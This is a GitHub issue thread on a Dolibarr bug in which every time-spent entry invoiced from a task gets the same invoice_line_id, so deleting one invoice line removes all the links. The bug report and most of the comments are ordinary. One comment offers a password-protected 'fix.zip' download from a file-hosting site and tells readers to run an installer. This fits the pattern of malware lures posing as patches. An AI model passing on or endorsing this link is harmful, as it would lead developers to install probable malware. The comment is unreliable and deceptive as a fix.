### ISSUE TITLE
invoice_line_id is the same for every timespent invoiced from a task

### ISSUE THREAD

**Issue by evarisk-micka** [Dolibarr/dolibarr#30768]
### Bug

When I create an invoice from timespent and ask for every timespent to be a invoice line, the invoice_line_id is the same for every timespent included

### Dolibarr Version

17,18,19,20

### Environment PHP

7.4

### Steps to reproduce the behavior and expected behavior

I create an invoice with the selected timespent
![image](https://github.com/user-attachments/assets/93c52c76-e14d-4fcc-af88-0e3115994d18)
(the link between invoice and timespent is well created)

I open the created invoice and delete the LAST invoice_line corresponding to the last timespent
![image](https://github.com/user-attachments/assets/a13a1d57-2f29-4808-bca8-8a473b3406fc)

After I delete the last invoice_line, every other link are deleted (because in database the invoice_line_id for every timespent was the same instead to have invoice_line_id corresponding to only one factureline)
![image](https://github.com/user-attachments/assets/bb62457f-3458-421c-a5b3-47929944d765)

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by eldy** [comment]
Thanks for this accurate descruption of trouble ! We need more bug report like this !

**Comment by lmag** [comment]
There you have it, @evarisk-micka ends his life as a developer on a high note! He may come back to the Dolibarr repository following this remarkable comment from @eldy , proof that you had indeed finished your DoliJedi training @nicolas-eoxia @evarisk-theo @eoxia-amandine
